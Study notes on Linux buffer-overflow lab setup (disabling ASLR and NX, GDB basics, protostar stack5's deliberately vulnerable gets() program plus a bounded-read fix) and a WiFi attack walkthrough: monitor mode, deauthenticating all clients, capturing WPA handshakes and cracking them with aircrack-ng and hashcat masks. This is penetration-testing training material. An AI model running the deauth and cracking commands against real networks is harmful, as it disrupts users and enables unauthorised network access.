Linux BOF & Wireless Attacks
Environment setup
install edb
sudo apt-get install edb
disable ASLR and DEP on linux
sudo bash -c "echo 0 > /proc/sys/kernel/randomize_va_space"
cat /proc/sys/kernel/randomize_va_space
sudo nano /etc/default/grub
# GRUB_CMDLINE_LINUX_DEFAULT="quiet splash noexec=off noexec32=off clearcpuid=514"
sudo update-grub
sudo reboot
edb is pretty much the same as Immunity Debugger; you can do the same steps as we did on Windows.
GDB Basics Cheat Sheet
Starting and Quitting
gdb <program>: Start GDB with a program.
run or r: Start the program.
quit or q: Exit GDB.
Breakpoints
break <location> or b <location>: Set a breakpoint.
info breakpoints or i b: List breakpoints.
delete <num> or d <num>: Delete a breakpoint.
Stepping and Continuing
next or n: Step to the next line (skip functions).
step or s: Step into a function.
continue or c: Continue execution.
Inspecting Variables and Memory
print <expr> or p <expr>: Print the value of an expression.
x/<format> <address>: Examine memory (e.g., x/4x for 4 hex values).
info locals: Show local variables.
Stack and Frames
backtrace or bt: Show the call stack.
frame <num> or f <num>: Switch to a frame.
info frame: Show details of the current frame.
Running and Control
kill: Stop program execution.
jump <location>: Jump to a line or address.
Threads
info threads: List threads.
thread <num>: Switch to a thread.
Exploit Vuln program
protostar stack5
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[64];
    gets(buffer);   /* unbounded read into a 64-byte stack buffer */
}
compile as a 32-bit, non-PIE program with no stack protector (NX was already disabled via the GRUB line above)
gcc -m32 -no-pie -fno-stack-protector stack5.c -o stack5
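The gets() call is the bug stack5 exists to demonstrate. As an added example (not protostar's code), here is the bounded replacement a fixed build would use; it also tells a line that exactly fills the buffer apart from one that overflowed, which a naive fgets()-plus-newline check gets wrong. The feed_line helper and the 64-byte buffer size are assumptions that mirror stack5.

```c
#include <stdio.h>
#include <string.h>

/* Hardened replacement for stack5's gets(buffer) (added example, not
 * protostar's code). Reads at most size-1 bytes, strips the newline and
 * reports whether the line was longer than the buffer, the case gets()
 * silently turns into a stack overflow.
 * Returns 1 if the whole line fit, 0 if truncated, -1 on EOF/no input. */
int read_line_bounded(char *buf, size_t size, FILE *in)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 1;
    }
    /* No newline: either EOF ended the line or the buffer filled up.
       Peek one byte to tell the two apart, then drain any excess so the
       next read starts on a fresh line instead of the leftover bytes. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return 1;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    return 0;
}

/* Test helper (assumption, not part of stack5): feed a constructed line of
 * `count` copies of `fill` through read_line_bounded via a temporary file.
 * last_line keeps what landed in the 64-byte buffer, same size as stack5. */
static char last_line[64];
int feed_line(char fill, int count, int newline)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return -2;
    for (int i = 0; i < count; i++)
        fputc(fill, f);
    if (newline)
        fputc('\n', f);
    rewind(f);
    int rc = read_line_bounded(last_line, sizeof last_line, f);
    fclose(f);
    return rc;
}
```

A 100-byte line yields 0 and a 63-byte one yields 1, so the caller can reject oversized input instead of letting it overwrite the saved return address.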
Wireless
Config Adapter TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
check Adapter info
iwconfig
lsusb
install required drivers
sudo apt install realtek-rtl8188eus-dkms -y
start monitoring
check for and kill processes that would interfere with monitor mode:
sudo airmon-ng check kill
Start monitor mode on the wireless interface; this will change the interface name to wlan0mon
sudo airmon-ng start wlan0
Now let's capture the wireless packets in the air around us to see which WiFi networks are available.
sudo airodump-ng wlan0
BSSID: The MAC address (unique identifier) of the access point or router.
ESSID: The network name (SSID) broadcast by the access point.
ENC: The encryption protocol used (e.g., WEP, WPA, WPA2).
Cipher: The encryption algorithm used for securing the data (e.g., CCMP, TKIP).
Auth: The authentication method (e.g., PSK, MGT) used to verify devices connecting to the network.
Channel: The channel (frequency) on which the access point is operating.
Network power:

Attacking target:
Capturing the target traffic to/from clients to get authentication handshakes.
sudo airodump-ng -w captures -c <channel> --bssid <MAC Address> wlan0
De-authenticate all clients to force them to re-authenticate, then capture the authentication packets.
sudo aireplay-ng --deauth 0 -a <MAC Address of AP> wlan0
Now try to capture the authentication handshakes again.
Inspecting the captured traffic with Wireshark:
wireshark capture-01.cap
In Wireshark, filter with eapol to get the 4-way handshake for WiFi connections.
Cracking Authentication keys
Put the interface back to managed mode
sudo airmon-ng stop wlan0mon
Cracking
sudo aircrack-ng <pcap-file> -w /usr/share/wordlists/rockyou.txt
Cracking with hashcat
Convert the cap file to a hash with hashcat-utils or using this web app: https://hashcat.net/cap2hashcat/
./cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
Brute Force Attack for 8 Digits
hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?d?d?d?d?d?d?d?d
Brute Force Attack for 8 Characters (Digits and Alphabet)
hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?a?a?a?a?a?a?a?a
?a: Represents any printable ASCII character (lowercase, uppercase, digits, and symbols).
Brute Force Attack for 8 Lowercase Letters
hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?l?l?l?l?l?l?l?l
Brute Force Attack for 8 to 11 Digits
hashcat -m 2500 -a 3 <OUTPUT_FILE>.hccapx ?d?d?d?d?d?d?d?d --increment --increment-min=8 --increment-max=11